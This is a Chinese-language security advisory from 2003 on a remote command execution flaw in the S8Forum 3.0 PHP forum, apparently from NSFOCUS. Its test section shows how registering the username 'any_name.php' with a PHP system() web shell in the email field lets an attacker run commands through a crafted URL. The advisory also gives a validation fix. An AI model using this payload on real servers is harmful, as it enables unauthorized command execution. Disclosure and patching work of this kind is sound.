S8Forum远程可执行任意命令漏洞
发布日期:2003-01-06
更新日期:2003-01-10
受影响系统:S8Forum S8Forum 3.0
描述:
S8Forum是一款由PHP编写的基于WEB的论坛程序。
S8Forum不充分检查用户提交的用户名,EMAIL等字段数据,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意指令。
S8Forum不使用数据库,而以注册用户为文件名建立文件,并存储在用户目录中。程序没有对用户提交的用户名,EMAIL等字段数据进行充分检查,在这些字段提供恶意PHP代码,可以使远程攻击者直接访问文件以WEB权限在系统上执行任意指令。
<*来源:Pine Digital Security Advisory
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104189641410531&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Pine Digital Security Advisory 提供了如下测试方法:
1、访问注册页面。
2、在用户名字段插入:
any_name.php
3、在密码字段插入:
any_pasword
4、在EMAIL字段输入:
<? system($cmd); ?>
然后提交如下访问:
http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 编辑register.php脚本:
在如下一行下面:
case 'registration_confirm':
增加下面的代码:
if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email) && $email !=
"") {
echo "<p><font size=\"4\" color=\"#FF0000\">Please
enter a valid email address. Press the back button and
correct it.</font></p>";
}
if(strstr($uname, "."))
echo "<p><font size=\"4\" color=\"#FF0000\">Please
enter a valid username. Press the back button and
correct it.</font></p>";
break;
厂商补丁:
S8Forum
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kellishaver.com/浏览次数:3290
严重程度:0(网友投票)